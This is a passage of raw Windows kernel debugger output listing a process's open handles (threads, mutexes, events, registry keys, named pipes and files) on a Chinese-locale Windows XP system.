Object: ffb1cda8  Type: (80f44528) Thread
    ObjectHeader: ffb1cd90
        HandleCount: 2  PointerCount: 3

0184: Object: e169f7f0  GrantedAccess: 000f0007
Object: e169f7f0  Type: (80f0a040) Section
    ObjectHeader: e169f7d8
        HandleCount: 4  PointerCount: 5
        Directory Object: e14ce6c8  Name: CiceroSharedMemDefaultS-1-5-21-1390067357-

776561741-839522115-1003

0188: Object: ffb21c98  GrantedAccess: 001f0001
Object: ffb21c98  Type: (80f0d040) Mutant
    ObjectHeader: ffb21c80
        HandleCount: 4  PointerCount: 5
        Directory Object: e14ce6c8  Name: CTF.LBES.MutexDefaultS-1-5-21-1390067357-

776561741-839522115-1003

018c: Object: ffb263d8  GrantedAccess: 001f0001
Object: ffb263d8  Type: (80f0d040) Mutant
    ObjectHeader: ffb263c0
        HandleCount: 4  PointerCount: 5
        Directory Object: e14ce6c8  Name: CTF.Compart.MutexDefaultS-1-5-21-1390067357-

776561741-839522115-1003

0190: Object: ffb26388  GrantedAccess: 001f0001
Object: ffb26388  Type: (80f0d040) Mutant
    ObjectHeader: ffb26370
        HandleCount: 4  PointerCount: 5
        Directory Object: e14ce6c8  Name: CTF.Asm.MutexDefaultS-1-5-21-1390067357-776561741

-839522115-1003

0194: Object: ffb26338  GrantedAccess: 001f0001
Object: ffb26338  Type: (80f0d040) Mutant
    ObjectHeader: ffb26320
        HandleCount: 4  PointerCount: 5
        Directory Object: e14ce6c8  Name: CTF.Layouts.MutexDefaultS-1-5-21-1390067357-

776561741-839522115-1003

0198: Object: ffb20270  GrantedAccess: 001f0001
Object: ffb20270  Type: (80f0d040) Mutant
    ObjectHeader: ffb20258
        HandleCount: 4  PointerCount: 5
        Directory Object: e14ce6c8  Name: CTF.TMD.MutexDefaultS-1-5-21-1390067357-776561741

-839522115-1003

019c: Object: e172ff00  GrantedAccess: 00020019
Object: e172ff00  Type: (80f0a350) Key
    ObjectHeader: e172fee8
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SYSTEM\CONTROLSET001

\CONTROL\NLS\LOCALE

01a0: Object: e172fa58  GrantedAccess: 00020019
Object: e172fa58  Type: (80f0a350) Key
    ObjectHeader: e172fa40
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SYSTEM\CONTROLSET001

\CONTROL\NLS\LOCALE\ALTERNATE SORTS

01a4: Object: e16b57e0  GrantedAccess: 00020019
Object: e16b57e0  Type: (80f0a350) Key
    ObjectHeader: e16b57c8
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SYSTEM\CONTROLSET001

\CONTROL\NLS\LANGUAGE GROUPS

01a8: Object: 80dfd8c0  GrantedAccess: 001f0003
Object: 80dfd8c0  Type: (80f0e490) Event
    ObjectHeader: 80dfd8a8
        HandleCount: 7  PointerCount: 8
        Directory Object: e14ce6c8  Name: userenv:  User Profile setup event

01ac: Object: 80e265c8  GrantedAccess: 00100001
Object: 80e265c8  Type: (80f42e70) File
    ObjectHeader: 80e265b0
        HandleCount: 1  PointerCount: 3
        Directory Object: 00000000  Name: \Documents and Settings\uty\桌面 {HarddiskVolume1}

01b0: Object: ffbb7818  GrantedAccess: 001f0003
Object: ffbb7818  Type: (80f0dca0) Semaphore
    ObjectHeader: ffbb7800
        HandleCount: 2  PointerCount: 3
        Directory Object: e14ce6c8  Name: shell.{7CB834F0-527B-11D2-9D1F-0000F805CA57}

01b4: Object: ffb18020  GrantedAccess: 00000002
Object: ffb18020  Type: (80f44528) Thread
    ObjectHeader: ffb18008
        HandleCount: 4  PointerCount: 6

01b8: Object: ffb20160  GrantedAccess: 001f0003
Object: ffb20160  Type: (80f0e490) Event
    ObjectHeader: ffb20148
        HandleCount: 1  PointerCount: 1

01bc: Object: ffb20130  GrantedAccess: 001f0003 (Protected)
Object: ffb20130  Type: (80f0e490) Event
    ObjectHeader: ffb20118
        HandleCount: 1  PointerCount: 3

01c0: Object: ffb200d0  GrantedAccess: 001f0003
Object: ffb200d0  Type: (80f0e490) Event
    ObjectHeader: ffb200b8
        HandleCount: 1  PointerCount: 1

01c4: Object: ffb18020  GrantedAccess: 001f03ff
Object: ffb18020  Type: (80f44528) Thread
    ObjectHeader: ffb18008
        HandleCount: 4  PointerCount: 6

01c8: Object: ffb21490  GrantedAccess: 001f0003
Object: ffb21490  Type: (80f0e490) Event
    ObjectHeader: ffb21478
        HandleCount: 1  PointerCount: 1

01cc: Object: ffb21410  GrantedAccess: 001f0003
Object: ffb21410  Type: (80f0e490) Event
    ObjectHeader: ffb213f8
        HandleCount: 1  PointerCount: 1

01d0: Object: ffb58b70  GrantedAccess: 001f0003
Object: ffb58b70  Type: (80f0e490) Event
    ObjectHeader: ffb58b58
        HandleCount: 1  PointerCount: 1

01d4: Object: 80e27e98  GrantedAccess: 0012019f
Object: 80e27e98  Type: (80f42e70) File
    ObjectHeader: 80e27e80
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \lsarpc {NamedPipe}

01d8: Object: ffb58b28  GrantedAccess: 001f0003 (Protected)
Object: ffb58b28  Type: (80f0e490) Event
    ObjectHeader: ffb58b10
        HandleCount: 1  PointerCount: 2

01dc: Object: e1759ab8  GrantedAccess: 001f0001
Object: e1759ab8  Type: (80f430b0) Port
    ObjectHeader: e1759aa0
        HandleCount: 1  PointerCount: 1

01e0: Object: ffb16f90  GrantedAccess: 00100001
Object: ffb16f90  Type: (80f42e70) File
    ObjectHeader: ffb16f78
        HandleCount: 1  PointerCount: 3
        Directory Object: 00000000  Name: \Documents and Settings\uty\Local

Settings\Application Data\Microsoft\CD Burning {HarddiskVolume1}

01e4: Object: ffb172a8  GrantedAccess: 00100001
Object: ffb172a8  Type: (80f42e70) File
    ObjectHeader: ffb17290
        HandleCount: 1  PointerCount: 3
        Directory Object: 00000000  Name: \Documents and Settings\All Users\桌面

{HarddiskVolume1}

01e8: Object: ffafb7e8  GrantedAccess: 00100020
Object: ffafb7e8  Type: (80f42e70) File
    ObjectHeader: ffafb7d0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-

Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

01ec: Object: ffb1b9e8  GrantedAccess: 001f0003
Object: ffb1b9e8  Type: (80f0e490) Event
    ObjectHeader: ffb1b9d0
        HandleCount: 1  PointerCount: 1

01f0: Object: ffb22bd8  GrantedAccess: 001f0003
Object: ffb22bd8  Type: (80f0dca0) Semaphore
    ObjectHeader: ffb22bc0
        HandleCount: 1  PointerCount: 1

01f4: Object: e13ca1d8  GrantedAccess: 000f003f (Protected)
Object: e13ca1d8  Type: (80f0a350) Key
    ObjectHeader: e13ca1c0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER

01f8: Object: ffb20190  GrantedAccess: 001f0003
Object: ffb20190  Type: (80f0e490) Event
    ObjectHeader: ffb20178
        HandleCount: 1  PointerCount: 1

01fc: Object: ffb1b9b8  GrantedAccess: 001f0003
Object: ffb1b9b8  Type: (80f0e490) Event
    ObjectHeader: ffb1b9a0
        HandleCount: 1  PointerCount: 2

0200: Object: ffb16ec0  GrantedAccess: 001f0003
Object: ffb16ec0  Type: (80f0e490) Event
    ObjectHeader: ffb16ea8
        HandleCount: 1  PointerCount: 2

0204: Object: e173e2f8  GrantedAccess: 000f003f
Object: e173e2f8  Type: (80f0a350) Key
    ObjectHeader: e173e2e0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID

0208: Object: e1768158  GrantedAccess: 000f003f
Object: e1768158  Type: (80f0a350) Key
    ObjectHeader: e1768140
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\SOFTWARE\MICROSOFT\WINDOWS\SHELL

020c: Object: ffbba468  GrantedAccess: 001f0003
Object: ffbba468  Type: (80f0dca0) Semaphore
    ObjectHeader: ffbba450
        HandleCount: 3  PointerCount: 4
        Directory Object: e14ce6c8  Name: shell.{A48F1A32-A340-11D1-BC6B-00A0C90312E1}

0210: Object: e1768088  GrantedAccess: 00020019
Object: e1768088  Type: (80f0a350) Key
    ObjectHeader: e1768070
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP

0214: Object: ffb1d938  GrantedAccess: 001f0003
Object: ffb1d938  Type: (80f0dca0) Semaphore
    ObjectHeader: ffb1d920
        HandleCount: 1  PointerCount: 1

0218: Object: ffb21bc0  GrantedAccess: 001f0003 (Protected)
Object: ffb21bc0  Type: (80f0e490) Event
    ObjectHeader: ffb21ba8
        HandleCount: 1  PointerCount: 2

021c: Object: e176afb8  GrantedAccess: 000f003f
Object: e176afb8  Type: (80f0a350) Key
    ObjectHeader: e176afa0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\FILEEXTS

0220: Object: e176af50  GrantedAccess: 000f003f
Object: e176af50  Type: (80f0a350) Key
    ObjectHeader: e176af38
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\SOFTWARE\MICROSOFT\WINDOWS\SHELLNOROAM

0224: Object: e176a360  GrantedAccess: 000f003f
Object: e176a360  Type: (80f0a350) Key
    ObjectHeader: e176a348
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\SOFTWARE\MICROSOFT\WINDOWS\SHELLNOROAM\MUICACHE

0228: Object: ffb134c0  GrantedAccess: 0012019f
Object: ffb134c0  Type: (80f42e70) File
    ObjectHeader: ffb134a8
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \wkssvc {NamedPipe}

022c: Object: ffb1a0f8  GrantedAccess: 001f0001
Object: ffb1a0f8  Type: (80f0d040) Mutant
    ObjectHeader: ffb1a0e0
        HandleCount: 1  PointerCount: 2
        Directory Object: e14ce6c8  Name: ZonesCacheCounterMutex

0230: Object: ffb130d0  GrantedAccess: 001f0003
Object: ffb130d0  Type: (80f0e490) Event
    ObjectHeader: ffb130b8
        HandleCount: 1  PointerCount: 1

0234: Object: e1a475a8  GrantedAccess: 0002001f
Object: e1a475a8  Type: (80f0a350) Key
    ObjectHeader: e1a47590
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MENUORDER\START MENU

0238: Object: ffb167e0  GrantedAccess: 00100001
Object: ffb167e0  Type: (80f42e70) File
    ObjectHeader: ffb167c8
        HandleCount: 1  PointerCount: 3
        Directory Object: 00000000  Name: \Documents and Settings\uty\「开始」菜单

{HarddiskVolume1}

023c: Object: ffb16748  GrantedAccess: 00100001
Object: ffb16748  Type: (80f42e70) File
    ObjectHeader: ffb16730
        HandleCount: 1  PointerCount: 3
        Directory Object: 00000000  Name: \Documents and Settings\All Users\「开始」菜单

{HarddiskVolume1}

0240: Object: ffb923c0  GrantedAccess: 00100020
Object: ffb923c0  Type: (80f42e70) File
    ObjectHeader: ffb923a8
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-

Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

0244: Object: ffb0fc00  GrantedAccess: 001f0003 (Protected)
Object: ffb0fc00  Type: (80f0e490) Event
    ObjectHeader: ffb0fbe8
        HandleCount: 1  PointerCount: 2

0248: Object: ffbdeb88  GrantedAccess: 001f0003
Object: ffbdeb88  Type: (80f0e490) Event
    ObjectHeader: ffbdeb70
        HandleCount: 1  PointerCount: 1

024c: Object: ffb0fca8  GrantedAccess: 001f0003
Object: ffb0fca8  Type: (80f0e490) Event
    ObjectHeader: ffb0fc90
        HandleCount: 1  PointerCount: 1

0250: Object: ffb16420  GrantedAccess: 00100003
Object: ffb16420  Type: (80f0e490) Event
    ObjectHeader: ffb16408
        HandleCount: 1  PointerCount: 1

0254: Object: ffb16da0  GrantedAccess: 001f0003
Object: ffb16da0  Type: (80f0e490) Event
    ObjectHeader: ffb16d88
        HandleCount: 1  PointerCount: 1

0258: Object: 80e1f0f8  GrantedAccess: 0012019f
Object: 80e1f0f8  Type: (80f42e70) File
    ObjectHeader: 80e1f0e0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \wkssvc {NamedPipe}

025c: Object: ffb12210  GrantedAccess: 001f0001
Object: ffb12210  Type: (80f0d040) Mutant
    ObjectHeader: ffb121f8
        HandleCount: 1  PointerCount: 2
        Directory Object: e14ce6c8  Name: ZonesCounterMutex

0260: Object: ffb11248  GrantedAccess: 00100020
Object: ffb11248  Type: (80f42e70) File
    ObjectHeader: ffb11230
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-

Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

0264: Object: e15e2aa0  GrantedAccess: 000f0007
Object: e15e2aa0  Type: (80f0a040) Section
    ObjectHeader: e15e2a88
        HandleCount: 1  PointerCount: 2
        Directory Object: e14ce6c8  Name: UrlZonesSM_uty

0268: Object: ffb18f10  GrantedAccess: 001f0001
Object: ffb18f10  Type: (80f0d040) Mutant
    ObjectHeader: ffb18ef8
        HandleCount: 1  PointerCount: 1

026c: Object: e1788830  GrantedAccess: 000f003f
Object: e1788830  Type: (80f0a350) Key
    ObjectHeader: e1788818
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\USERASSIST\{75048700-EF1F

-11D0-9888-006097DEACF9}\COUNT

0270: Object: e16c29c8  GrantedAccess: 001f0001
Object: e16c29c8  Type: (80f430b0) Port
    ObjectHeader: e16c29b0
        HandleCount: 1  PointerCount: 1

0274: Object: ffb0fab0  GrantedAccess: 001f0001
Object: ffb0fab0  Type: (80f0d040) Mutant
    ObjectHeader: ffb0fa98
        HandleCount: 1  PointerCount: 2
        Directory Object: e14ce6c8  Name: _SHuassist.mtx

0278: Object: ffb2ba08  GrantedAccess: 00100003
Object: ffb2ba08  Type: (80f0dca0) Semaphore
    ObjectHeader: ffb2b9f0
        HandleCount: 2  PointerCount: 3
        Directory Object: e14ce6c8  Name: PowerProfileRegistrySemaphore

027c: Object: ffb10e90  GrantedAccess: 001f0001
Object: ffb10e90  Type: (80f0d040) Mutant
    ObjectHeader: ffb10e78
        HandleCount: 1  PointerCount: 1

0280: Object: e14247e8  GrantedAccess: 000f003f
Object: e14247e8  Type: (80f0a350) Key
    ObjectHeader: e14247d0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\USERASSIST\{5E6AB780-7743

-11CF-A12B-00AA004AE837}\COUNT

0284: Object: ffb259c8  GrantedAccess: 001f0003
Object: ffb259c8  Type: (80f0e490) Event
    ObjectHeader: ffb259b0
        HandleCount: 2  PointerCount: 3
        Directory Object: e14ce6c8  Name: ShellReadyEvent

0288: Object: ffb0fc78  GrantedAccess: 001f0003
Object: ffb0fc78  Type: (80f0e490) Event
    ObjectHeader: ffb0fc60
        HandleCount: 1  PointerCount: 1

028c: Object: ffb0f980  GrantedAccess: 001f0003
Object: ffb0f980  Type: (80f0e490) Event
    ObjectHeader: ffb0f968
        HandleCount: 1  PointerCount: 1

0290: Object: ffb567a0  GrantedAccess: 001f0001
Object: ffb567a0  Type: (80f0d040) Mutant
    ObjectHeader: ffb56788
        HandleCount: 1  PointerCount: 1

0294: Object: 80f24190  GrantedAccess: 001f0003
Object: 80f24190  Type: (80f0e490) Event
    ObjectHeader: 80f24178
        HandleCount: 1  PointerCount: 1

0298: Object: ffb0a560  GrantedAccess: 00100020
Object: ffb0a560  Type: (80f42e70) File
    ObjectHeader: ffb0a548
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-

Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

029c: Object: ffb56238  GrantedAccess: 00100020
Object: ffb56238  Type: (80f42e70) File
    ObjectHeader: ffb56220
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-

Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

02a0: Object: ffb0f618  GrantedAccess: 001f03ff
Object: ffb0f618  Type: (80f44528) Thread
    ObjectHeader: ffb0f600
        HandleCount: 2  PointerCount: 4

02a4: Object: ffb0af90  GrantedAccess: 001f0003
Object: ffb0af90  Type: (80f0e490) Event
    ObjectHeader: ffb0af78
        HandleCount: 1  PointerCount: 1

02a8: Object: 80e1b4e0  GrantedAccess: 0012019f
Object: 80e1b4e0  Type: (80f42e70) File
    ObjectHeader: 80e1b4c8
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \ntsvcs {NamedPipe}

02ac: Object: ffb0f348  GrantedAccess: 001f0001
Object: ffb0f348  Type: (80f0d040) Mutant
    ObjectHeader: ffb0f330
        HandleCount: 1  PointerCount: 1

02b0: Object: ffbb6070  GrantedAccess: 001f0001
Object: ffbb6070  Type: (80f0d040) Mutant
    ObjectHeader: ffbb6058
        HandleCount: 1  PointerCount: 1

02b4: Object: ffb0f920  GrantedAccess: 001f0003
Object: ffb0f920  Type: (80f0e490) Event
    ObjectHeader: ffb0f908
        HandleCount: 1  PointerCount: 1

02b8: Object: 80f35a08  GrantedAccess: 001f0003
Object: 80f35a08  Type: (80f0e490) Event
    ObjectHeader: 80f359f0
        HandleCount: 1  PointerCount: 2

02bc: Object: ffb70470  GrantedAccess: 00100002 (Inherit)
Object: ffb70470  Type: (80f0e490) Event
    ObjectHeader: ffb70458
        HandleCount: 2  PointerCount: 5
        Directory Object: e14ce6c8  Name: mixercallback

02c0: Object: ffb010c8  GrantedAccess: 001f0001
Object: ffb010c8  Type: (80f0d040) Mutant
    ObjectHeader: ffb010b0
        HandleCount: 1  PointerCount: 1

02c4: Object: 80dda138  GrantedAccess: 001f0003
Object: 80dda138  Type: (80f0e490) Event
    ObjectHeader: 80dda120
        HandleCount: 1  PointerCount: 1

02c8: Object: 80dfd758  GrantedAccess: 001f0001
Object: 80dfd758  Type: (80f0d040) Mutant
    ObjectHeader: 80dfd740
        HandleCount: 1  PointerCount: 1

02cc: Object: ffbb4510  GrantedAccess: 001f0003
Object: ffbb4510  Type: (80f0e490) Event
    ObjectHeader: ffbb44f8
        HandleCount: 1  PointerCount: 2
        Directory Object: e14ce6c8  Name: HPlugEjectEvent

02d0: Object: ffb20ec0  GrantedAccess: 00100003
Object: ffb20ec0  Type: (80f0dca0) Semaphore
    ObjectHeader: ffb20ea8
        HandleCount: 1  PointerCount: 1

02d4: Object: ffb0fcd8  GrantedAccess: 001f0003
Object: ffb0fcd8  Type: (80f0e490) Event
    ObjectHeader: ffb0fcc0
        HandleCount: 1  PointerCount: 1

02d8: Object: ffb164e0  GrantedAccess: 00100003
Object: ffb164e0  Type: (80f0dca0) Semaphore
    ObjectHeader: ffb164c8
        HandleCount: 1  PointerCount: 1

02dc: Object: e17fa3e0  GrantedAccess: 00020019
Object: e17fa3e0  Type: (80f0a350) Key
    ObjectHeader: e17fa3c8
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\WINDOWS

NT\CURRENTVERSION\DRIVERS32

02e0: Object: ffb568e8  GrantedAccess: 001f0003
Object: ffb568e8  Type: (80f0e490) Event
    ObjectHeader: ffb568d0
        HandleCount: 1  PointerCount: 1

02e4: Object: 80e24908  GrantedAccess: 0012019f
Object: 80e24908  Type: (80f42e70) File
    ObjectHeader: 80e248f0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \svcctl {NamedPipe}

02e8: Object: e1605b20  GrantedAccess: 00000004
Object: e1605b20  Type: (80f0a040) Section
    ObjectHeader: e1605b08
        HandleCount: 3  PointerCount: 4
        Directory Object: e14ce6c8  Name: mmGlobalPnpInfo

02ec: Object: ffb12a48  GrantedAccess: 001f0003
Object: ffb12a48  Type: (80f0e490) Event
    ObjectHeader: ffb12a30
        HandleCount: 1  PointerCount: 1

02f0: Object: e17da6b8  GrantedAccess: 001f0001
Object: e17da6b8  Type: (80f430b0) Port
    ObjectHeader: e17da6a0
        HandleCount: 1  PointerCount: 1

02f4: Object: ffb9fca8  GrantedAccess: 001f0003
Object: ffb9fca8  Type: (80f0e490) Event
    ObjectHeader: ffb9fc90
        HandleCount: 1  PointerCount: 1

02f8: Object: ffb16c08  GrantedAccess: 0012019f
Object: ffb16c08  Type: (80f42e70) File
    ObjectHeader: ffb16bf0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \{9B365890-165F-11D0-A195-0020AFD156E4}

{KSENUM#00000001}

02fc: Object: e13c7948  GrantedAccess: 00000004
Object: e13c7948  Type: (80f0a040) Section
    ObjectHeader: e13c7930
        HandleCount: 3  PointerCount: 4
        Directory Object: e14ce6c8  Name: WDMAUD_Path_Size

0300: Object: 80e306c0  GrantedAccess: 0012019f
Object: 80e306c0  Type: (80f42e70) File
    ObjectHeader: 80e306a8
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \srvsvc {NamedPipe}

0304: Object: ffb922f8  GrantedAccess: 00100003
Object: ffb922f8  Type: (80f0e490) Event
    ObjectHeader: ffb922e0
        HandleCount: 1  PointerCount: 1

0308: Object: e13c7948  GrantedAccess: 00000004
Object: e13c7948  Type: (80f0a040) Section
    ObjectHeader: e13c7930
        HandleCount: 3  PointerCount: 4
        Directory Object: e14ce6c8  Name: WDMAUD_Path_Size

030c: Object: ffb1c020  GrantedAccess: 001f03ff
Object: ffb1c020  Type: (80f44528) Thread
    ObjectHeader: ffb1c008
        HandleCount: 2  PointerCount: 4

0310: Object: ffb857f8  GrantedAccess: 001f0001
Object: ffb857f8  Type: (80f0d040) Mutant
    ObjectHeader: ffb857e0
        HandleCount: 1  PointerCount: 1

0314: Object: ffb9f3e8  GrantedAccess: 001f0003
Object: ffb9f3e8  Type: (80f0e490) Event
    ObjectHeader: ffb9f3d0
        HandleCount: 1  PointerCount: 1

0318: Object: ffb53878  GrantedAccess: 001f0001
Object: ffb53878  Type: (80f0d040) Mutant
    ObjectHeader: ffb53860
        HandleCount: 3  PointerCount: 4
        Directory Object: e14ce6c8  Name: CTF.TimListCache.FMPDefaultS-1-5-21-1390067357-

776561741-839522115-1003MUTEX.DefaultS-1-5-21-1390067357-776561741-839522115-1003

031c: Object: e172ba18  GrantedAccess: 00000006
Object: e172ba18  Type: (80f0a040) Section
    ObjectHeader: e172ba00
        HandleCount: 2  PointerCount: 3
        Directory Object: e14ce6c8  Name: WDMAUD_Callbacks

0320: Object: ffb98640  GrantedAccess: 00100003
Object: ffb98640  Type: (80f0dca0) Semaphore
    ObjectHeader: ffb98628
        HandleCount: 1  PointerCount: 1

0324: Object: e169f040  GrantedAccess: 000f001f
Object: e169f040  Type: (80f0a040) Section
    ObjectHeader: e169f028
        HandleCount: 3  PointerCount: 4
        Directory Object: e14ce6c8  Name: CTF.TimListCache.FMPDefaultS-1-5-21-1390067357-

776561741-839522115-1003SFM.DefaultS-1-5-21-1390067357-776561741-839522115-1003

0328: Object: ffb9ca80  GrantedAccess: 00100003
Object: ffb9ca80  Type: (80f0e490) Event
    ObjectHeader: ffb9ca68
        HandleCount: 1  PointerCount: 1

032c: Object: ffb0fde8  GrantedAccess: 001f0003
Object: ffb0fde8  Type: (80f0e490) Event
    ObjectHeader: ffb0fdd0
        HandleCount: 1  PointerCount: 1

0330: Object: ffba77f0  GrantedAccess: 001f0003 (Protected)
Object: ffba77f0  Type: (80f0e490) Event
    ObjectHeader: ffba77d8
        HandleCount: 1  PointerCount: 2

0334: Object: 80d56f10  GrantedAccess: 00100003
Object: 80d56f10  Type: (80f0e490) Event
    ObjectHeader: 80d56ef8
        HandleCount: 1  PointerCount: 1

0338: Object: ffb59cd0  GrantedAccess: 00100002 (Inherit)
Object: ffb59cd0  Type: (80f0e490) Event
    ObjectHeader: ffb59cb8
        HandleCount: 2  PointerCount: 6
        Directory Object: e14ce6c8  Name: hardwaremixercallback

033c: Object: ffaf8768  GrantedAccess: 001f03ff
Object: ffaf8768  Type: (80f44528) Thread
    ObjectHeader: ffaf8750
        HandleCount: 2  PointerCount: 4

0340: Object: ffb92500  GrantedAccess: 001f0003
Object: ffb92500  Type: (80f0e490) Event
    ObjectHeader: ffb924e8
        HandleCount: 1  PointerCount: 1

0344: Object: ffb9eff0  GrantedAccess: 001f0003 (Protected)
Object: ffb9eff0  Type: (80f0e490) Event
    ObjectHeader: ffb9efd8
        HandleCount: 1  PointerCount: 2

0348: Object: ffb9f2a0  GrantedAccess: 001f0003
Object: ffb9f2a0  Type: (80f0e490) Event
    ObjectHeader: ffb9f288
        HandleCount: 1  PointerCount: 1

034c: Object: ffb201c0  GrantedAccess: 001f0001
Object: ffb201c0  Type: (80f0d040) Mutant
    ObjectHeader: ffb201a8
        HandleCount: 1  PointerCount: 1

0350: Object: ffb56f80  GrantedAccess: 001f0001
Object: ffb56f80  Type: (80f0d040) Mutant
    ObjectHeader: ffb56f68
        HandleCount: 2  PointerCount: 3
        Directory Object: e14ce6c8  Name: MidiMapper_Configure

0354: Object: ffb56a68  GrantedAccess: 001f0001
Object: ffb56a68  Type: (80f0d040) Mutant
    ObjectHeader: ffb56a50
        HandleCount: 2  PointerCount: 3
        Directory Object: e14ce6c8  Name: MidiMapper_modLongMessage_RefCnt

0358: Object: ffb0f1e0  GrantedAccess: 001f0003
Object: ffb0f1e0  Type: (80f0e490) Event
    ObjectHeader: ffb0f1c8
        HandleCount: 2  PointerCount: 2

035c: Object: ffbaa1a8  GrantedAccess: 001f0003 (Protected)
Object: ffbaa1a8  Type: (80f0e490) Event
    ObjectHeader: ffbaa190
        HandleCount: 1  PointerCount: 2

0360: Object: ffaf84f0  GrantedAccess: 001f03ff
Object: ffaf84f0  Type: (80f44528) Thread
    ObjectHeader: ffaf84d8
        HandleCount: 2  PointerCount: 4

0364: Object: ffb969d0  GrantedAccess: 001f0003
Object: ffb969d0  Type: (80f0e490) Event
    ObjectHeader: ffb969b8
        HandleCount: 1  PointerCount: 1

0368: Object: ffaf7028  GrantedAccess: 0012019f
Object: ffaf7028  Type: (80f42e70) File
    ObjectHeader: ffaf7010
        HandleCount: 1  PointerCount: 1

036c: Object: ffba6430  GrantedAccess: 001f0003
Object: ffba6430  Type: (80f0e490) Event
    ObjectHeader: ffba6418
        HandleCount: 1  PointerCount: 1

0370: Object: ffb9f530  GrantedAccess: 001f0003
Object: ffb9f530  Type: (80f0e490) Event
    ObjectHeader: ffb9f518
        HandleCount: 1  PointerCount: 1

0374: Object: ffb265d0  GrantedAccess: 00100004
Object: ffb265d0  Type: (80f3ee70) WmiGuid
    ObjectHeader: ffb265b8
        HandleCount: 1  PointerCount: 2

0378: Object: ffafb750  GrantedAccess: 001200a0
Object: ffafb750  Type: (80f42e70) File
    ObjectHeader: ffafb738
        HandleCount: 1  PointerCount: 1

037c: Object: ffb16950  GrantedAccess: 00100001
Object: ffb16950  Type: (80f42e70) File
    ObjectHeader: ffb16938
        HandleCount: 1  PointerCount: 3
        Directory Object: 00000000  Name: \Documents and Settings\uty\PrintHood {HarddiskVolume1}

0380: Object: 80e18308  GrantedAccess: 00100020
Object: 80e18308  Type: (80f42e70) File
    ObjectHeader: 80e182f0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

0384: Object: ffbb2420  GrantedAccess: 00120116
Object: ffbb2420  Type: (80f42e70) File
    ObjectHeader: ffbb2408
        HandleCount: 1  PointerCount: 1

0388: Object: ffaf7630  GrantedAccess: 001200a0
Object: ffaf7630  Type: (80f42e70) File
    ObjectHeader: ffaf7618
        HandleCount: 1  PointerCount: 1

038c: Object: ffaf7960  GrantedAccess: 00100003
Object: ffaf7960  Type: (80f42e70) File
    ObjectHeader: ffaf7948
        HandleCount: 1  PointerCount: 1

0390: Object: ffaf7a48  GrantedAccess: 001200a0
Object: ffaf7a48  Type: (80f42e70) File
    ObjectHeader: ffaf7a30
        HandleCount: 1  PointerCount: 1

0394: Object: ffafbc20  GrantedAccess: 00100003
Object: ffafbc20  Type: (80f0dca0) Semaphore
    ObjectHeader: ffafbc08
        HandleCount: 1  PointerCount: 1

0398: Object: ffb986b0  GrantedAccess: 00100003
Object: ffb986b0  Type: (80f0dca0) Semaphore
    ObjectHeader: ffb98698
        HandleCount: 1  PointerCount: 1

039c: Object: e1a57020  GrantedAccess: 00020019
Object: e1a57020  Type: (80f0a350) Key
    ObjectHeader: e1a57008
